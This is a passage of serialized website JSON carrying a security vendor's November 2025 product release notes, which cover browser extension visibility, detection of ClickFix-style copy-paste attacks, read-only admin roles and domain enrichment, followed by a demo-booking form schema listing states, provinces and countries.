",{"data":13434,"content":13436,"nodeType":1364},{"uri":13435},"https://pushsecurity.com/help/audience/engineering/webhooks-v1/detections",[13437],{"data":13438,"marks":13439,"value":13108,"nodeType":1257},{},[],{"data":13441,"marks":13442,"value":31,"nodeType":1257},{},[],{"data":13444,"content":13445,"nodeType":1888},{},[13446],{"data":13447,"content":13448,"nodeType":1258},{},[13449,13453,13460],{"data":13450,"marks":13451,"value":13452,"nodeType":1257},{},[],"Push now uses static IP addresses to emit webhook events. These IP addresses are in the same range we previously used, but if you wish to update your network filtering to these new, narrower IP addresses, you can. ",{"data":13454,"content":13456,"nodeType":1364},{"uri":13455},"https://pushsecurity.com/help/audience/engineering/webhooks-v1/section/ip-addresses",[13457],{"data":13458,"marks":13459,"value":13108,"nodeType":1257},{},[],{"data":13461,"marks":13462,"value":31,"nodeType":1257},{},[],{"data":13464,"content":13465,"nodeType":1258},{},[13466],{"data":13467,"marks":13468,"value":31,"nodeType":1257},{},[],{"entries":13470},{"inline":13471,"hyperlink":13472,"block":13503},[],[13473,13479,13484,13488,13493,13498],{"sys":13474,"__typename":13475,"title":13476,"slug":13477,"articleId":13478},{"id":13103},"HelpArticle","How does Push detect malicious browser extensions?","how-does-push-detect-malicious-browser-extensions",10148,{"sys":13480,"__typename":13475,"title":13481,"slug":13482,"articleId":13483},{"id":13158},"Can Push detect and disable other installed browser extensions?","can-push-detect-other-installed-browser-extensions",10138,{"sys":13485,"__typename":1278,"title":13486,"slug":13487},{"id":13183},"Introducing malicious copy and paste detection","introducing-malicious-copy-paste-detection",{"sys":13489,"__typename":13475,"title":13490,"slug":13491,"articleId":13492},{"id":13236},"How does Push detect attacks like ClickFix and FileFix?","how-does-push-detect-attacks-like-clickfix-and-filefix",10141,{"sys":13494,"__typename":13475,"title":13495,"slug":13496,"articleId":13497},{"id":13288},"How do I add custom branding to Push banners and block pages?","how-do-i-add-custom-branding-to-push-banners-and-block-pages",10147,{"sys":13499,"__typename":13475,"title":13500,"slug":13501,"articleId":13502},{"id":13368},"How do I configure browser event storage?","how-do-i-configure-browser-event-storage",10146,[13504,13511,13518],{"sys":13505,"__typename":6404,"title":13506,"caption":118,"layoutMode":118,"file":13507},{"id":13091},"Malicious extension detection - Controls page - for release notes",{"url":13508,"width":13509,"height":13510},"https://images.ctfassets.net/y1cdw1ablpvd/2OhoXumfBK0saT2oLeCPrI/95950149e4c7f11c53948ba0cf0b09b5/malicious_ext_det_controls_pg.png",1337,767,{"sys":13512,"__typename":6404,"title":13513,"caption":118,"layoutMode":118,"file":13514},{"id":13146},"Browser extension block screen - KB 10138",{"url":13515,"width":13516,"height":13517},"https://images.ctfassets.net/y1cdw1ablpvd/3i6Sj2jgOimCqGtpKy1B7p/3c78161975dbc1cab3d5d2c454206111/extension_block_page_dark_theme.png",1270,717,{"sys":13519,"__typename":6404,"title":13520,"caption":13521,"layoutMode":118,"file":13522},{"id":13276},"Branded banner example - dark style - KB 10147","Example of a dark style mid-screen banner",{"url":13523,"width":13524,"height":13525},"https://images.ctfassets.net/y1cdw1ablpvd/F8v8jKH2SXlMeHbG83Nvh/2b7c51c8bbb2ad74947f4a2bcee3048b/midscreen_dark_banner.png",2944,562,{"items":13527},[13528],{"__typename":1278,"sys":13529,"content":13531,"title":14235,"synopsis":14236,"hashTags":118,"publishedDate":14237,"slug":14238,"tagsCollection":14239,"authorsCollection":14243},{"id":13530},"3ygDMHnTN58Lyb3W3k969w",{"json":13532},{"data":13533,"content":13534,"nodeType":1259},{},[13535,13541,13613,13619,13626,13651,13676,13709,13715,13732,13738,13745,13752,13784,13790,13807,13813,13829,13836,13859,13866,13873,13896,13912,13918,13924,13931,13947,13954,14007,14014,14020,14038,14044,14060,14067,14090,14113,14119,14125,14229],{"data":13536,"content":13537,"nodeType":1311},{},[13538],{"data":13539,"marks":13540,"value":12977,"nodeType":1257},{},[],{"data":13542,"content":13543,"nodeType":1884},{},[13544,13554,13564,13574,13584,13594,13604],{"data":13545,"content":13546,"nodeType":1888},{},[13547],{"data":13548,"content":13549,"nodeType":1258},{},[13550],{"data":13551,"marks":13552,"value":13553,"nodeType":1257},{},[],"Get visibility for all installed browser extensions in your environment",{"data":13555,"content":13556,"nodeType":1888},{},[13557],{"data":13558,"content":13559,"nodeType":1258},{},[13560],{"data":13561,"marks":13562,"value":13563,"nodeType":1257},{},[],"New detection for ClickFix-style malicious copy-paste attacks",{"data":13565,"content":13566,"nodeType":1888},{},[13567],{"data":13568,"content":13569,"nodeType":1258},{},[13570],{"data":13571,"marks":13572,"value":13573,"nodeType":1257},{},[],"New Labs feature: Experimental detections",{"data":13575,"content":13576,"nodeType":1888},{},[13577],{"data":13578,"content":13579,"nodeType":1258},{},[13580],{"data":13581,"marks":13582,"value":13583,"nodeType":1257},{},[],"RBAC for the Push admin console",{"data":13585,"content":13586,"nodeType":1888},{},[13587],{"data":13588,"content":13589,"nodeType":1258},{},[13590],{"data":13591,"marks":13592,"value":13593,"nodeType":1257},{},[],"URLscan.io and domain registration enrichment for detections",{"data":13595,"content":13596,"nodeType":1888},{},[13597],{"data":13598,"content":13599,"nodeType":1258},{},[13600],{"data":13601,"marks":13602,"value":13603,"nodeType":1257},{},[],"Filter events by entities",{"data":13605,"content":13606,"nodeType":1888},{},[13607],{"data":13608,"content":13609,"nodeType":1258},{},[13610],{"data":13611,"marks":13612,"value":13040,"nodeType":1257},{},[],{"data":13614,"content":13615,"nodeType":1311},{},[13616],{"data":13617,"marks":13618,"value":13553,"nodeType":1257},{},[],{"data":13620,"content":13621,"nodeType":1258},{},[13622],{"data":13623,"marks":13624,"value":13625,"nodeType":1257},{},[],"You can now use Push to see other browser extensions installed on your employees’ browsers.",{"data":13627,"content":13628,"nodeType":1258},{},[13629,13633,13638,13642,13647],{"data":13630,"marks":13631,"value":13632,"nodeType":1257},{},[],"You can enable this feature by going to ",{"data":13634,"marks":13635,"value":13637,"nodeType":1257},{},[13636],{"type":1318},"Settings > Organization",{"data":13639,"marks":13640,"value":13641,"nodeType":1257},{},[]," in the Push admin console and toggling on ",{"data":13643,"marks":13644,"value":13646,"nodeType":1257},{},[13645],{"type":1318},"Browser extension visibility",{"data":13648,"marks":13649,"value":13650,"nodeType":1257},{},[],". There is no end-user impact when you enable this feature.",{"data":13652,"content":13653,"nodeType":1258},{},[13654,13658,13663,13667,13672],{"data":13655,"marks":13656,"value":13657,"nodeType":1257},{},[],"You’ll see browser extension data populate a new ",{"data":13659,"marks":13660,"value":13662,"nodeType":1257},{},[13661],{"type":1318},"Browser extensions",{"data":13664,"marks":13665,"value":13666,"nodeType":1257},{},[]," page in the admin console under ",{"data":13668,"marks":13669,"value":13671,"nodeType":1257},{},[13670],{"type":1318},"Investigate",{"data":13673,"marks":13674,"value":13675,"nodeType":1257},{},[],". With this information, you can see:",{"data":13677,"content":13678,"nodeType":1884},{},[13679,13689,13699],{"data":13680,"content":13681,"nodeType":1888},{},[13682],{"data":13683,"content":13684,"nodeType":1258},{},[13685],{"data":13686,"marks":13687,"value":13688,"nodeType":1257},{},[],"Which extensions have been installed for each employee and browser.",{"data":13690,"content":13691,"nodeType":1888},{},[13692],{"data":13693,"content":13694,"nodeType":1258},{},[13695],{"data":13696,"marks":13697,"value":13698,"nodeType":1257},{},[],"How they were installed (e.g. by policy, manually, or sideloaded).",{"data":13700,"content":13701,"nodeType":1888},{},[13702],{"data":13703,"content":13704,"nodeType":1258},{},[13705],{"data":13706,"marks":13707,"value":13708,"nodeType":1257},{},[],"Which permissions they have.",{"data":13710,"content":13714,"nodeType":1335},{"target":13711},{"sys":13712},{"id":13713,"type":1340,"linkType":1341},"5J5jdmwugy7yU8GGwxe7iH",[],{"data":13716,"content":13717,"nodeType":1258},{},[13718,13721,13729],{"data":13719,"marks":13720,"value":31,"nodeType":1257},{},[],{"data":13722,"content":13725,"nodeType":13109},{"target":13723},{"sys":13724},{"id":13158,"type":1340,"linkType":1341},[13726],{"data":13727,"marks":13728,"value":13108,"nodeType":1257},{},[],{"data":13730,"marks":13731,"value":31,"nodeType":1257},{},[],{"data":13733,"content":13734,"nodeType":1311},{},[13735],{"data":13736,"marks":13737,"value":13563,"nodeType":1257},{},[],{"data":13739,"content":13740,"nodeType":1258},{},[13741],{"data":13742,"marks":13743,"value":13744,"nodeType":1257},{},[],"Push can now detect malicious copy and paste attacks like ClickFix, FileFix, and other fake CAPTCHA-style techniques.",{"data":13746,"content":13747,"nodeType":1258},{},[13748],{"data":13749,"marks":13750,"value":13751,"nodeType":1257},{},[],"These techniques have become one of the most prevalent attack types this year, and rely on deceiving users into manually or automatically copying malicious code and running it locally.",{"data":13753,"content":13754,"nodeType":1258},{},[13755,13759,13764,13768,13772,13776,13780],{"data":13756,"marks":13757,"value":13758,"nodeType":1257},{},[],"You can enable ",{"data":13760,"marks":13761,"value":13763,"nodeType":1257},{},[13762],{"type":1318},"Malicious copy and paste detection",{"data":13765,"marks":13766,"value":13767,"nodeType":1257},{},[]," from the ",{"data":13769,"marks":13770,"value":13082,"nodeType":1257},{},[13771],{"type":1318},{"data":13773,"marks":13774,"value":13775,"nodeType":1257},{},[]," page of the Push admin console. Add a configuration rule to set the detection to ",{"data":13777,"marks":13778,"value":13328,"nodeType":1257},{},[13779],{"type":1318},{"data":13781,"marks":13782,"value":13783,"nodeType":1257},{},[],". You can also add an exception for any staff who routinely handle malicious scripts, such as security team members, or add domains to the ignore list as needed.",{"data":13785,"content":13789,"nodeType":1335},{"target":13786},{"sys":13787},{"id":13788,"type":1340,"linkType":1341},"2fPaiwRCAUd8lMvsVO03HZ",[],{"data":13791,"content":13792,"nodeType":1258},{},[13793,13796,13804],{"data":13794,"marks":13795,"value":31,"nodeType":1257},{},[],{"data":13797,"content":13800,"nodeType":13109},{"target":13798},{"sys":13799},{"id":13183,"type":1340,"linkType":1341},[13801],{"data":13802,"marks":13803,"value":13108,"nodeType":1257},{},[],{"data":13805,"marks":13806,"value":31,"nodeType":1257},{},[],{"data":13808,"content":13809,"nodeType":1311},{},[13810],{"data":13811,"marks":13812,"value":13573,"nodeType":1257},{},[],{"data":13814,"content":13815,"nodeType":1258},{},[13816,13820,13825],{"data":13817,"marks":13818,"value":13819,"nodeType":1257},{},[],"Get early access to new detections from the Push research team by enabling ",{"data":13821,"marks":13822,"value":13824,"nodeType":1257},{},[13823],{"type":1318},"Experimental detections",{"data":13826,"marks":13827,"value":13828,"nodeType":1257},{},[],", a Labs feature.",{"data":13830,"content":13831,"nodeType":1258},{},[13832],{"data":13833,"marks":13834,"value":13835,"nodeType":1257},{},[],"Labs features are new features Push is testing before releasing them. Early access detections are designed to catch emerging attacker techniques, but may also produce more false positives while we finetune them. These early access detections do not block any user actions.",{"data":13837,"content":13838,"nodeType":1258},{},[13839,13843,13847,13851,13856],{"data":13840,"marks":13841,"value":13842,"nodeType":1257},{},[],"Enable ",{"data":13844,"marks":13845,"value":13824,"nodeType":1257},{},[13846],{"type":1318},{"data":13848,"marks":13849,"value":13850,"nodeType":1257},{},[]," by going to ",{"data":13852,"marks":13853,"value":13855,"nodeType":1257},{},[13854],{"type":1318},"Settings > Labs",{"data":13857,"marks":13858,"value":13357,"nodeType":1257},{},[],{"data":13860,"content":13861,"nodeType":1311},{},[13862],{"data":13863,"marks":13864,"value":13865,"nodeType":1257},{},[],"RBAC for the Push platform",{"data":13867,"content":13868,"nodeType":1258},{},[13869],{"data":13870,"marks":13871,"value":13872,"nodeType":1257},{},[],"You can now provide read-only access to the Push admin console to facilitate investigations, review detections, check app usage by department, help with employee offboarding — or anything else you need.",{"data":13874,"content":13875,"nodeType":1258},{},[13876,13880,13884,13888,13893],{"data":13877,"marks":13878,"value":13879,"nodeType":1257},{},[],"To add a read-only admin, go to ",{"data":13881,"marks":13882,"value":13637,"nodeType":1257},{},[13883],{"type":1318},{"data":13885,"marks":13886,"value":13887,"nodeType":1257},{},[]," in the admin console. Enter the email address of the admin you want to invite and set the role to ",{"data":13889,"marks":13890,"value":13892,"nodeType":1257},{},[13891],{"type":1318},"Read only",{"data":13894,"marks":13895,"value":2249,"nodeType":1257},{},[],{"data":13897,"content":13898,"nodeType":1258},{},[13899,13903,13908],{"data":13900,"marks":13901,"value":13902,"nodeType":1257},{},[],"Note that existing Push admins now have the role of ",{"data":13904,"marks":13905,"value":13907,"nodeType":1257},{},[13906],{"type":1318},"Full access",{"data":13909,"marks":13910,"value":13911,"nodeType":1257},{},[],". You can adjust that role as needed from the Organization page, too.",{"data":13913,"content":13917,"nodeType":1335},{"target":13914},{"sys":13915},{"id":13916,"type":1340,"linkType":1341},"7kraCfSP2YwdEEwZ8FxM1t",[],{"data":13919,"content":13920,"nodeType":1311},{},[13921],{"data":13922,"marks":13923,"value":13593,"nodeType":1257},{},[],{"data":13925,"content":13926,"nodeType":1258},{},[13927],{"data":13928,"marks":13929,"value":13930,"nodeType":1257},{},[],"You can now enrich detections in Push with information from urlscan.io, and see when the domain was first registered. This information gives you domain-relevant context to support investigations.",{"data":13932,"content":13933,"nodeType":1258},{},[13934,13938,13943],{"data":13935,"marks":13936,"value":13937,"nodeType":1257},{},[],"To enable this feature, go to ",{"data":13939,"marks":13940,"value":13942,"nodeType":1257},{},[13941],{"type":1318},"Settings > Advanced > Domain enrichment",{"data":13944,"marks":13945,"value":13946,"nodeType":1257},{},[]," in the Push admin console or enable it from any existing detection event.",{"data":13948,"content":13949,"nodeType":1258},{},[13950],{"data":13951,"marks":13952,"value":13953,"nodeType":1257},{},[],"With this enrichment, you can quickly see:",{"data":13955,"content":13956,"nodeType":1884},{},[13957,13967,13977,13987,13997],{"data":13958,"content":13959,"nodeType":1888},{},[13960],{"data":13961,"content":13962,"nodeType":1258},{},[13963],{"data":13964,"marks":13965,"value":13966,"nodeType":1257},{},[],"The timestamp for when a domain was first registered",{"data":13968,"content":13969,"nodeType":1888},{},[13970],{"data":13971,"content":13972,"nodeType":1258},{},[13973],{"data":13974,"marks":13975,"value":13976,"nodeType":1257},{},[],"The number of times a domain was scanned on urlscan",{"data":13978,"content":13979,"nodeType":1888},{},[13980],{"data":13981,"content":13982,"nodeType":1258},{},[13983],{"data":13984,"marks":13985,"value":13986,"nodeType":1257},{},[],"The first time a domain was scanned",{"data":13988,"content":13989,"nodeType":1888},{},[13990],{"data":13991,"content":13992,"nodeType":1258},{},[13993],{"data":13994,"marks":13995,"value":13996,"nodeType":1257},{},[],"The last time a domain or IP was scanned",{"data":13998,"content":13999,"nodeType":1888},{},[14000],{"data":14001,"content":14002,"nodeType":1258},{},[14003],{"data":14004,"marks":14005,"value":14006,"nodeType":1257},{},[],"A urlscan verdict (e.g. “potentially malicious”)",{"data":14008,"content":14009,"nodeType":1258},{},[14010],{"data":14011,"marks":14012,"value":14013,"nodeType":1257},{},[],"You’ll see the enrichment data on the details slideout for an individual detection.",{"data":14015,"content":14019,"nodeType":1335},{"target":14016},{"sys":14017},{"id":14018,"type":1340,"linkType":1341},"563fJFSgoLDOwSXSQ9Y0MM",[],{"data":14021,"content":14022,"nodeType":1258},{},[14023,14026,14035],{"data":14024,"marks":14025,"value":31,"nodeType":1257},{},[],{"data":14027,"content":14031,"nodeType":13109},{"target":14028},{"sys":14029},{"id":14030,"type":1340,"linkType":1341},"19qsIXEG6EN9EK0VRH3pw9",[14032],{"data":14033,"marks":14034,"value":13108,"nodeType":1257},{},[],{"data":14036,"marks":14037,"value":31,"nodeType":1257},{},[],{"data":14039,"content":14040,"nodeType":1311},{},[14041],{"data":14042,"marks":14043,"value":13603,"nodeType":1257},{},[],{"data":14045,"content":14046,"nodeType":1258},{},[14047,14051,14056],{"data":14048,"marks":14049,"value":14050,"nodeType":1257},{},[],"You can now filter the ",{"data":14052,"marks":14053,"value":14055,"nodeType":1257},{},[14054],{"type":1318},"Events",{"data":14057,"marks":14058,"value":14059,"nodeType":1257},{},[]," page in the Push admin console by entities such as employees and apps to make triage more efficient.",{"data":14061,"content":14062,"nodeType":1258},{},[14063],{"data":14064,"marks":14065,"value":14066,"nodeType":1257},{},[],"With this option, you can do quick searches such as:",{"data":14068,"content":14069,"nodeType":1884},{},[14070,14080],{"data":14071,"content":14072,"nodeType":1888},{},[14073],{"data":14074,"content":14075,"nodeType":1258},{},[14076],{"data":14077,"marks":14078,"value":14079,"nodeType":1257},{},[],"See all recent events associated with an employee",{"data":14081,"content":14082,"nodeType":1888},{},[14083],{"data":14084,"content":14085,"nodeType":1258},{},[14086],{"data":14087,"marks":14088,"value":14089,"nodeType":1257},{},[],"See all recent logins for a given app",{"data":14091,"content":14092,"nodeType":1258},{},[14093,14097,14101,14105,14110],{"data":14094,"marks":14095,"value":14096,"nodeType":1257},{},[],"From the ",{"data":14098,"marks":14099,"value":14055,"nodeType":1257},{},[14100],{"type":1318},{"data":14102,"marks":14103,"value":14104,"nodeType":1257},{},[]," page, go to ",{"data":14106,"marks":14107,"value":14109,"nodeType":1257},{},[14108],{"type":1318},"Filters > Entity type",{"data":14111,"marks":14112,"value":2249,"nodeType":1257},{},[],{"data":14114,"content":14115,"nodeType":1311},{},[14116],{"data":14117,"marks":14118,"value":13040,"nodeType":1257},{},[],{"data":14120,"content":14121,"nodeType":1258},{},[14122],{"data":14123,"marks":14124,"value":13389,"nodeType":1257},{},[],{"data":14126,"content":14127,"nodeType":1884},{},[14128,14165,14187,14197,14219],{"data":14129,"content":14130,"nodeType":1888},{},[14131],{"data":14132,"content":14133,"nodeType":1258},{},[14134,14138,14148,14151,14161],{"data":14135,"marks":14136,"value":14137,"nodeType":1257},{},[],"You can now configure exceptions for ",{"data":14139,"content":14143,"nodeType":13109},{"target":14140},{"sys":14141},{"id":14142,"type":1340,"linkType":1341},"4oOTN6FXPpZg9MLgQUujys",[14144],{"data":14145,"marks":14146,"value":14147,"nodeType":1257},{},[],"MFA findings",{"data":14149,"marks":14150,"value":1703,"nodeType":1257},{},[],{"data":14152,"content":14156,"nodeType":13109},{"target":14153},{"sys":14154},{"id":14155,"type":1340,"linkType":1341},"2eOzRGosD2Ghaipao7NY8W",[14157],{"data":14158,"marks":14159,"value":14160,"nodeType":1257},{},[],"reused password",{"data":14162,"marks":14163,"value":14164,"nodeType":1257},{},[]," findings. This is useful if you purposefully reuse passwords between systems or enforce MFA through a third-party provider.",{"data":14166,"content":14167,"nodeType":1888},{},[14168],{"data":14169,"content":14170,"nodeType":1258},{},[14171,14175,14184],{"data":14172,"marks":14173,"value":14174,"nodeType":1257},{},[],"We’ve added several first-class SIEM integrations. ",{"data":14176,"content":14180,"nodeType":13109},{"target":14177},{"sys":14178},{"id":14179,"type":1340,"linkType":1341},"2M73i6A90S9MY6Pe8uVjVv",[14181],{"data":14182,"marks":14183,"value":13108,"nodeType":1257},{},[],{"data":14185,"marks":14186,"value":2249,"nodeType":1257},{},[],{"data":14188,"content":14189,"nodeType":1888},{},[14190],{"data":14191,"content":14192,"nodeType":1258},{},[14193],{"data":14194,"marks":14195,"value":14196,"nodeType":1257},{},[],"We’ve expanded the limit for URLs you can block using the URL blocking control to 2,000.",{"data":14198,"content":14199,"nodeType":1888},{},[14200],{"data":14201,"content":14202,"nodeType":1258},{},[14203,14207,14216],{"data":14204,"marks":14205,"value":14206,"nodeType":1257},{},[],"You can now set a time period after which to automatically un-license inactive employees, to make license management easier. ",{"data":14208,"content":14212,"nodeType":13109},{"target":14209},{"sys":14210},{"id":14211,"type":1340,"linkType":1341},"6Ad43w7Cjz2L5fZN2klIOn",[14213],{"data":14214,"marks":14215,"value":13108,"nodeType":1257},{},[],{"data":14217,"marks":14218,"value":2249,"nodeType":1257},{},[],{"data":14220,"content":14221,"nodeType":1888},{},[14222],{"data":14223,"content":14224,"nodeType":1258},{},[14225],{"data":14226,"marks":14227,"value":14228,"nodeType":1257},{},[],"Push now supports Prisma Access browser.\n",{"data":14230,"content":14231,"nodeType":1258},{},[14232],{"data":14233,"marks":14234,"value":31,"nodeType":1257},{},[],"Product release: November 2025","Here’s what’s new on the Push platform for November 2025.","2025-11-04T00:00:00.000Z","product-release-november-2025",{"items":14240},[14241],{"sys":14242,"name":12958},{"id":12957},{"items":14244},[14245],{"fullName":12962,"firstName":12963,"jobTitle":12964,"profilePicture":14246},{"url":12966},"content:blog:product-release-march-2026.json","blog/product-release-march-2026.json","blog/product-release-march-2026",{"id":1205,"name":14251,"createdAt":14252,"updatedAt":14253,"archived":6,"fieldGroups":14254,"configuration":15184,"displayOptions":15190,"legalConsentOptions":15206,"formType":15207},"[Event - SecTor 2026] Book a demo","2026-04-06T20:45:53.411Z","2026-04-06T20:53:30.560Z",[14255,14264,14273,14278],{"groupType":14256,"richTextType":1257,"fields":14257},"default_group",[14258],{"objectTypeId":14259,"name":14260,"required":246,"hidden":6,"placeholder":14261,"validation":14262,"fieldType":14260},"0-1","email","Company email",{"blockedEmailDomains":14263,"useDefaultBlockList":246},[31],{"groupType":14256,"richTextType":1257,"fields":14265},[14266,14270],{"objectTypeId":14259,"name":14267,"required":246,"hidden":6,"placeholder":14268,"fieldType":14269},"firstname","First name","single_line_text",{"objectTypeId":14259,"name":14271,"required":246,"hidden":6,"placeholder":14272,"fieldType":14269},"lastname","Last name",{"groupType":14256,"richTextType":1257,"fields":14274},[14275],{"objectTypeId":14259,"name":14276,"required":246,"hidden":6,"placeholder":14277,"fieldType":14269},"company","Organization",{"groupType":14256,"richTextType":1257,"fields":14279},[14280],{"objectTypeId":14259,"name":14281,"required":246,"hidden":6,"dependentFields":14282,"options":14475,"placeholder":15183,"fieldType":14440},"company_country",[14283,14441],{"dependentCondition":14284,"dependentField":14288},{"operator":14285,"values":14286},"set_any",[14287],"United States",{"objectTypeId":14259,"name":14289,"required":246,"hidden":6,"options":14290,"placeholder":14439,"fieldType":14440},"company_state",[14291,14294,14296,14298,14301,14304,14307,14310,14313,14316,14319,14322,14325,14328,14331,14334,14337,14340,14343,14346,14349,14352,14355,14358,14361,14364,14367,14370,14373,14376,14379,14382,14385,14388,14391,14394,14397,14400,14403,14406,14409,14412,14415,14418,14421,14424,14427,14430,14433,14436],{"label":14292,"value":14292,"description":31,"displayOrder":14293},"Alabama",0,{"label":14295,"value":14295,"description":31,"displayOrder":42},"Alaska",{"label":14297,"value":14297,"description":31,"displayOrder":107},"Arizona",{"label":14299,"value":14299,"description":31,"displayOrder":14300},"Arkansas",3,{"label":14302,"value":14302,"description":31,"displayOrder":14303},"California",4,{"label":14305,"value":14305,"description":31,"displayOrder":14306},"Colorado",5,{"label":14308,"value":14308,"description":31,"displayOrder":14309},"Connecticut",6,{"label":14311,"value":14311,"description":31,"displayOrder":14312},"Delaware",7,{"label":14314,"value":14314,"description":31,"displayOrder":14315},"Florida",8,{"label":14317,"value":14317,"description":31,"displayOrder":14318},"Georgia",9,{"label":14320,"value":14320,"description":31,"displayOrder":14321},"Hawaii",10,{"label":14323,"value":14323,"description":31,"displayOrder":14324},"Idaho",11,{"label":14326,"value":14326,"description":31,"displayOrder":14327},"Illinois",12,{"label":14329,"value":14329,"description":31,"displayOrder":14330},"Indiana",13,{"label":14332,"value":14332,"description":31,"displayOrder":14333},"Iowa",14,{"label":14335,"value":14335,"description":31,"displayOrder":14336},"Kansas",15,{"label":14338,"value":14338,"description":31,"displayOrder":14339},"Kentucky",16,{"label":14341,"value":14341,"description":31,"displayOrder":14342},"Louisiana",17,{"label":14344,"value":14344,"description":31,"displayOrder":14345},"Maine",18,{"label":14347,"value":14347,"description":31,"displayOrder":14348},"Maryland",19,{"label":14350,"value":14350,"description":31,"displayOrder":14351},"Massachusetts",20,{"label":14353,"value":14353,"description":31,"displayOrder":14354},"Michigan",21,{"label":14356,"value":14356,"description":31,"displayOrder":14357},"Minnesota",22,{"label":14359,"value":14359,"description":31,"displayOrder":14360},"Mississippi",23,{"label":14362,"value":14362,"description":31,"displayOrder":14363},"Missouri",24,{"label":14365,"value":14365,"description":31,"displayOrder":14366},"Montana",25,{"label":14368,"value":14368,"description":31,"displayOrder":14369},"Nebraska",26,{"label":14371,"value":14371,"description":31,"displayOrder":14372},"Nevada",27,{"label":14374,"value":14374,"description":31,"displayOrder":14375},"New Hampshire",28,{"label":14377,"value":14377,"description":31,"displayOrder":14378},"New Jersey",29,{"label":14380,"value":14380,"description":31,"displayOrder":14381},"New Mexico",30,{"label":14383,"value":14383,"description":31,"displayOrder":14384},"New York",31,{"label":14386,"value":14386,"description":31,"displayOrder":14387},"North Carolina",32,{"label":14389,"value":14389,"description":31,"displayOrder":14390},"North Dakota",33,{"label":14392,"value":14392,"description":31,"displayOrder":14393},"Ohio",34,{"label":14395,"value":14395,"description":31,"displayOrder":14396},"Oklahoma",35,{"label":14398,"value":14398,"description":31,"displayOrder":14399},"Oregon",36,{"label":14401,"value":14401,"description":31,"displayOrder":14402},"Pennsylvania",37,{"label":14404,"value":14404,"description":31,"displayOrder":14405},"Rhode Island",38,{"label":14407,"value":14407,"description":31,"displayOrder":14408},"South Carolina",39,{"label":14410,"value":14410,"description":31,"displayOrder":14411},"South Dakota",40,{"label":14413,"value":14413,"description":31,"displayOrder":14414},"Tennessee",41,{"label":14416,"value":14416,"description":31,"displayOrder":14417},"Texas",42,{"label":14419,"value":14419,"description":31,"displayOrder":14420},"Utah",43,{"label":14422,"value":14422,"description":31,"displayOrder":14423},"Vermont",44,{"label":14425,"value":14425,"description":31,"displayOrder":14426},"Virginia",45,{"label":14428,"value":14428,"description":31,"displayOrder":14429},"Washington",46,{"label":14431,"value":14431,"description":31,"displayOrder":14432},"West Virginia",47,{"label":14434,"value":14434,"description":31,"displayOrder":14435},"Wisconsin",48,{"label":14437,"value":14437,"description":31,"displayOrder":14438},"Wyoming",49,"State","dropdown",{"dependentCondition":14442,"dependentField":14445},{"operator":14285,"values":14443},[14444],"Canada",{"objectTypeId":14259,"name":14446,"required":246,"hidden":6,"options":14447,"placeholder":14474,"fieldType":14440},"company_province",[14448,14450,14452,14454,14456,14458,14460,14462,14464,14466,14468,14470,14472],{"label":14449,"value":14449,"description":31,"displayOrder":14293},"Alberta",{"label":14451,"value":14451,"description":31,"displayOrder":42},"British Columbia",{"label":14453,"value":14453,"description":31,"displayOrder":107},"Manitoba",{"label":14455,"value":14455,"description":31,"displayOrder":14300},"New Brunswick",{"label":14457,"value":14457,"description":31,"displayOrder":14303},"Newfoundland and Labrador",{"label":14459,"value":14459,"description":31,"displayOrder":14306},"Northwest Territories",{"label":14461,"value":14461,"description":31,"displayOrder":14309},"Nova Scotia",{"label":14463,"value":14463,"description":31,"displayOrder":14312},"Nunavut",{"label":14465,"value":14465,"description":31,"displayOrder":14315},"Ontario",{"label":14467,"value":14467,"description":31,"displayOrder":14318},"Prince Edward Island",{"label":14469,"value":14469,"description":31,"displayOrder":14321},"Quebec",{"label":14471,"value":14471,"description":31,"displayOrder":14324},"Saskatchewan",{"label":14473,"value":14473,"description":31,"displayOrder":14327},"Yukon","Province",[14476,14478,14481,14483,14485,14487,14489,14491,14493,14495,14497,14499,14501,14503,14505,14507,14509,14511,14513,14515,14517,14519,14521,14523,14525,14527,14529,14531,14533,14535,14537,14539,14541,14543,14545,14547,14549,14551,14553,14555,14557,14558,14560,14562,14564,14566,14568,14570,14572,14574,14576,14579,14582,14585,14588,14591,14594,14597,14600,14603,14606,14609,14612,14615,14618,14621,14624,14627,14630,14633,14636,14639,14642,14645,14648,14651,14654,14657,14660,14663,14666,14669,14672,14675,14678,14681,14684,14686,14689,14692,14695,14698,14701,14704,14707,14710,14713,14716,14719,14722,14725,14727,14730,14733,14736,14739,14742,14745,14748,14751,14754,14757,14760,14763,14766,14769,14772,14775,14778,14781,14784,14786,14789,14792,14795,14798,14801,14804,14807,14810,14813,14816,14819,14822,14825,14828,14831,14834,14837,14840,14843,14845,14848,14851,14854,14857,14860,14863,14866,14869,14872,14875,14878,14881,14884,14887,14890,14893,14896,14899,14902,14905,14908,14911,14914,14917,14920,14923,14926,14929,14932,14935,14938,14941,14944,14947,14950,14953,14956,14959,14962,14965,14968,14971,14974,14977,14980,14983,14986,14989,14992,14995,14998,15001,15004,15007,15010,15013,15016,15019,15022,15025,15028,15031,15034,15037,15040,15043,15046,15049,15052,15055,15058,15061,15064,15067,15070,15073,15076,15079,15082,15085,15088,15091,15094,15097,15100,15103,15106,15109,15112,15115,15118,15121,15124,15127,15130,15133,15136,15139,15142,15145,15147,15150,15153,15156,15159,15162,15165,15168,15171,15174,15177,15180],{"label":14477,"value":14477,"description":31,"displayOrder":14293},"Afghanistan",{"label":14479,"value":14480,"description":31,"displayOrder":42},"Aland Islands","Åland Islands",{"label":14482,"value":14482,"description":31,"displayOrder":107},"Albania",{"label":14484,"value":14484,"description":31,"displayOrder":14300},"Algeria",{"label":14486,"value":14486,"description":31,"displayOrder":14303},"American Samoa",{"label":14488,"value":14488,"description":31,"displayOrder":14306},"Andorra",{"label":14490,"value":14490,"description":31,"displayOrder":14309},"Angola",{"label":14492,"value":14492,"description":31,"displayOrder":14312},"Anguilla",{"label":14494,"value":14494,"description":31,"displayOrder":14315},"Antarctica",{"label":14496,"value":14496,"description":31,"displayOrder":14318},"Antigua and Barbuda",{"label":14498,"value":14498,"description":31,"displayOrder":14321},"Argentina",{"label":14500,"value":14500,"description":31,"displayOrder":14324},"Armenia",{"label":14502,"value":14502,"description":31,"displayOrder":14327},"Aruba",{"label":14504,"value":14504,"description":31,"displayOrder":14330},"Asia/Pacific 